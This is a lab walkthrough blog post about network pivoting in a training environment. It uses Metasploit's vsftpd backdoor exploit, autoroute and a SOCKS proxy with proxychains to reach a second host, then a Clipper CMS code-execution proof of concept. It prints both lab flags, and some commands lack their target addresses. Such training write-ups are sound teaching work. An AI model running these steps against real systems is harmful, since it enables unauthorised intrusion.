Network Pivoting using Metasploit and Proxychains

Nishant Sharma
Pentester Academy Blog
5 min readAug 5, 2020


In our lab walkthrough series, we go through selected lab exercises on our AttackDefense Platform. Premium labs require a subscription, but you can sign in for free to try our community labs and view the list of topics — no subscription or VPN required!

Network pivoting refers to the process of utilizing a compromised machine, that is connected to multiple networks, to get access to other networks. This approach comes handy when the attacker wants to target the machines on a different subnet.

Lab Scenario

We have set up the below scenario in our Attack-Defense labs for our students to practice. The screenshots have been taken from our online lab environment.

Lab: Pivoting IV

This lab comprises a Kali machine and two target machines present on two different networks. The user or practitioner will get command-line interface (CLI) access to the Kali machine, through the web browser.

Challenge Statement

In this pivoting challenge, the network architecture is as shown below:

Kali — — — -> Target A — —— — -> Target B

Objective: Your mission is to get the flags kept in flagX.txt file on both Target A and Target B.


Step 1: Check the IP address of our Kali machine. From the information given in the challenge description, that target A should be located at

Command: ip addr

Step 2: Scan target A with Nmap banner grab script. From the output, it is clear that vsftpd and SSH services are running on the machine.

Command: nmap -sV — script=banner

Step 3: Start Metasploit and use the vsftpd backdoor exploit. On firing the exploit a command shell session will be established.


use exploit/unix/ftp/vsftpd_234_backdoor



Step 4: This session can be used to find and retrieve the flag hidden on this machine.

Command: find / -name flag*

Step 5: Once the flag is retrieved, check the IP address information of machine A which is needed to create a pivot.

Command: cat /usr/bin/flag1.txt

Flag 1: 6d026e8a09c93a18eca404b834c13991

Step 6: Spawn a meterpreter session by upgrading the current shell session.

Command: sessions -u 1

Step 7: All open sessions can be listed by using sessions command.

Command: sessions

Step 8: Use autoroute module to create a pivot for the other network i.e.


use post/multi/manage/autoroute




Step 9: To use external tools like Nmap, set up a system-wide proxy by using auxiliary/server/socks4a module. Change the default SRVPORT (i.e. 1080) to match the default port of proxychains i.e. 9050.


use auxiliary/server/socks4a

show options

set SRVPORT 9050


Step 10: Use netstat command to verify that the proxy is running.

Command: netstat -tpln

Step 11: Scan the target B machine using Nmap over proxychains. Remember, no configuration change is needed for proxychains to work because proxychains used port 9050 by default.

Command: proxychains nmap -sT -Pn

Step 12: The target B is running HTTP and MySQL services. Check/identify the web app by doing a curl request over proxychains.

Command: proxychains curl

Step 13: The web app running on target B is clipper CMS. Search for clipper CMS exploits, one can easily find a code execution exploit with python POC exploit code which can be used to exploit target B.

Step 14: Save the python POC code in a python file and run it. It requires three parameters i.e. clipper URL, admin username, and password.


proxychains python admin password


Step 15: Once we get console on target B machine, we can search and retrieve the flag.

Command: find / -name *flag* 2>/dev/null

Command: cat /tmp/flag.txt

Flag 2: dbaa3f9b469d1315486ca82d6aa300b7

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